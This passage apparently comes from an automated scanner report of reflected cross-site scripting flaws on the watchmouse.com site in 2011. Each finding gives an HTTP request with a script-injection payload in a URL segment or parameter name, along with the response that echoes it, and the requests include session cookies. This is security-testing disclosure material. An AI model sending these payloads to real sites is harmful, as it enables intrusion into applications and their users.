This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/resellers.php?33a7d"><script>alert(1)</script>1799e2b91de=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:07:10 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-074627af44d454e897c10ddd4da4cc70"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 14438

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/resellers.php?33a7d"><script>alert(1)</script>1799e2b91de=1" method="post">
...[SNIP]...

1.212. http://www.watchmouse.com/en/scripting.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/scripting.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ac78"><script>alert(1)</script>3ff20eb3e24 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en2ac78"><script>alert(1)</script>3ff20eb3e24/scripting.php HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/register.php?vpackid=35
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.9.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:44 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-18f4203549ae7c48556bd86419a8e8d3"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13091

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/en2ac78"><script>alert(1)</script>3ff20eb3e24/scripting.php" method="post">
...[SNIP]...

1.213. http://www.watchmouse.com/en/scripting.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/scripting.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98e87"><script>alert(1)</script>8d7fc937638 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/scripting.php98e87"><script>alert(1)</script>8d7fc937638 HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/register.php?vpackid=35
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.9.10.1297252772

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:54 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-3829c41741ac708da38c54b0c848b67d"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13064

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/scripting.php98e87"><script>alert(1)</script>8d7fc937638" method="post">
...[SNIP]...

1.214. http://www.watchmouse.com/en/search.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/search.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27836"><script>alert(1)</script>34e8fed9bf5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en27836"><script>alert(1)</script>34e8fed9bf5/search.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:56 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-2812479f71f572e6cdabf24414e9dca6"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13064

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/en27836"><script>alert(1)</script>34e8fed9bf5/search.php" method="post">
...[SNIP]...

1.215. http://www.watchmouse.com/en/search.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/search.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb535"><script>alert(1)</script>49625e88926 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/search.phpeb535"><script>alert(1)</script>49625e88926 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:08:00 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-a695f46fd82f50bdb719de920ebf6e4c"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13037

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/search.phpeb535"><script>alert(1)</script>49625e88926" method="post">
...[SNIP]...

1.216. http://www.watchmouse.com/en/search.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af2be"><script>alert(1)</script>ae18970339 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/search.php?af2be"><script>alert(1)</script>ae18970339=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:07:42 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-1bdd18da47a2f93e425b7676cf43c04a"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 14595

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/search.php?af2be"><script>alert(1)</script>ae18970339=1" method="post">
...[SNIP]...

1.217. http://www.watchmouse.com/en/security_news.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/security_news.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd3c6"><script>alert(1)</script>b95973a59c4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /encd3c6"><script>alert(1)</script>b95973a59c4/security_news.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:28 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-af0b6712281a3362165376aa808f6657"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13127

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/encd3c6"><script>alert(1)</script>b95973a59c4/security_news.php" method="post">
...[SNIP]...

1.218. http://www.watchmouse.com/en/security_news.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/security_news.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14254"><script>alert(1)</script>058baf01b6a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/security_news.php14254"><script>alert(1)</script>058baf01b6a HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:30 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-96f0b9024471f1139fefde4d96d5fbb7"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13100

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/security_news.php14254"><script>alert(1)</script>058baf01b6a" method="post">
...[SNIP]...

1.219. http://www.watchmouse.com/en/security_news.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/security_news.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ede88"><script>alert(1)</script>597f9dc12c1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/security_news.php?ede88"><script>alert(1)</script>597f9dc12c1=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:07:26 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-26ff80edebaa3ad290ea0e9e118742de"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19847

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="/en/security_news.php?ede88"><script>alert(1)</script>597f9dc12c1=1" method="post">
...[SNIP]...

1.220. http://www.watchmouse.com/en/sitemap.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/sitemap.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40133"><script>alert(1)</script>1f3586f5628 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en40133"><script>alert(1)</script>1f3586f5628/sitemap.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:21 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-076e24d690c5f2145109e1a8f3439e18"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13073

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/en40133"><script>alert(1)</script>1f3586f5628/sitemap.php" method="post">
...[SNIP]...

1.221. http://www.watchmouse.com/en/sitemap.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/sitemap.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 767da"><script>alert(1)</script>6fdc1c8f29 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/sitemap.php767da"><script>alert(1)</script>6fdc1c8f29 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:29 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-45cecd5cb505dd6d03fc09e0e93a9d82"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13037

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/sitemap.php767da"><script>alert(1)</script>6fdc1c8f29" method="post">
...[SNIP]...

1.222. http://www.watchmouse.com/en/sitemap.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/sitemap.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b2ea"><script>alert(1)</script>5ed9b16a840 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/sitemap.php?6b2ea"><script>alert(1)</script>5ed9b16a840=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:06:06 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-3fbd600192de025246a15bd7e3885f3d"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 17519

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/sitemap.php?6b2ea"><script>alert(1)</script>5ed9b16a840=1" method="post">
...[SNIP]...

1.223. http://www.watchmouse.com/en/terms.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/terms.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72b45"><script>alert(1)</script>2ad67787581 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en72b45"><script>alert(1)</script>2ad67787581/terms.php?mlang=en HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:55 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-c7a7046a7f9d2381951d38c593b3741e"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13136

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/en72b45"><script>alert(1)</script>2ad67787581/terms.php?mlang=en" method="post">
...[SNIP]...

1.224. http://www.watchmouse.com/en/terms.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/terms.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b9ff"><script>alert(1)</script>f72b5c6d527 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/terms.php5b9ff"><script>alert(1)</script>f72b5c6d527?mlang=en HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:08:02 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-0595a5f742f28768002dceef459ba5c4"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13109

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/terms.php5b9ff"><script>alert(1)</script>f72b5c6d527?mlang=en" method="post">
...[SNIP]...

1.225. http://www.watchmouse.com/en/terms.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/terms.php

Issue detail

